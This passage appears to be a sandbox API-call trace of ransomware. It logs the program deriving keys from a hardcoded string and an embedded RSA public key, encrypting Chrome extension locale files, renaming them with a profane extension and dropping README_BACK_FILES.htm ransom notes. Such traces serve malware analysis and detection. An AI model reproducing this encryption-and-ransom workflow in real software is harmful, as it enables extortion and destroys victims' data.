Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x0) returned 1 [0247.911] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.gsg")) returned 1 [0247.913] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.fuck")) returned 1 [0247.914] CryptDestroyHash (hHash=0x29387f8) returned 1 [0247.914] CryptDestroyKey (hKey=0x29389f8) returned 1 [0247.914] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0247.914] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.914] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0247.914] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\readme_back_files.htm")) returned 0xffffffff [0247.914] AreFileApisANSI () returned 1 [0247.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0247.914] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.915] GetFileType (hFile=0x5d50) returned 0x1 [0247.915] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.916] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.916] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0247.917] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.917] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.917] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.917] GetLastError () returned 0x0 [0247.917] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json")) returned 0x20 [0247.917] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x80) returned 1 [0247.918] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.918] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.918] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.919] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0247.921] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.921] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.921] CryptHashData (hHash=0x29387f8, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.921] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0247.921] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.921] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.921] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293a488) returned 1 [0247.921] CryptImportPublicKeyInfo (in: hCryptProv=0x293a488, dwCertEncodingType=0x1, pInfo=0x292f940*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f970*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f978*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29371b8) returned 1 [0247.921] CryptEncrypt (in: hKey=0x29371b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.921] CryptEncrypt (in: hKey=0x29371b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a048*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293a048*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.922] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293a048*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293a048*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.922] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd7, lpOverlapped=0x0) returned 1 [0247.923] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd7, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0247.923] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0247.924] CloseHandle (hObject=0x5d58) returned 1 [0247.924] CloseHandle (hObject=0x5d5c) returned 1 [0247.924] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), bFailIfExists=0) returned 1 [0247.927] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x0) returned 1 [0247.928] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.gsg")) returned 1 [0247.929] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.fuck")) returned 1 [0247.932] CryptDestroyHash (hHash=0x29387f8) returned 1 [0247.932] CryptDestroyKey (hKey=0x2938af8) returned 1 [0247.932] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0247.932] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.932] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0247.932] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\readme_back_files.htm")) returned 0xffffffff [0247.932] AreFileApisANSI () returned 1 [0247.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0247.932] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.933] GetFileType (hFile=0x5d50) returned 0x1 [0247.933] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.934] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.934] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938af8 [0247.934] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.934] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.934] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.934] GetLastError () returned 0x0 [0247.935] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json")) returned 0x20 [0247.935] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0247.935] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.936] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.937] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.937] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0247.939] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.939] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.939] CryptHashData (hHash=0x29387f8, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.939] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0247.939] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.939] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.939] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293a0d0) returned 1 [0247.940] CryptImportPublicKeyInfo (in: hCryptProv=0x293a0d0, dwCertEncodingType=0x1, pInfo=0x29304a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29304d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29304d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936c78) returned 1 [0247.940] CryptEncrypt (in: hKey=0x2936c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.940] CryptEncrypt (in: hKey=0x2936c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293a158*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293a158*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.940] WriteFile (in: hFile=0x5d58, lpBuffer=0x293a158*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293a158*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.941] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdf, lpOverlapped=0x0) returned 1 [0247.942] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0247.942] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0247.942] CloseHandle (hObject=0x5d5c) returned 1 [0247.942] CloseHandle (hObject=0x5d58) returned 1 [0247.943] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0247.947] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0247.947] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.gsg")) returned 1 [0247.949] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.fuck")) returned 1 [0247.949] CryptDestroyHash (hHash=0x29387f8) returned 1 [0247.949] CryptDestroyKey (hKey=0x29389f8) returned 1 [0247.949] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0247.950] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.950] FindClose (in: hFindFile=0x2938af8 | out: hFindFile=0x2938af8) returned 1 [0247.950] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0247.950] AreFileApisANSI () returned 1 [0247.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.950] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.951] GetFileType (hFile=0x5d50) returned 0x1 [0247.951] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.952] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.952] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0247.953] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.953] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.953] 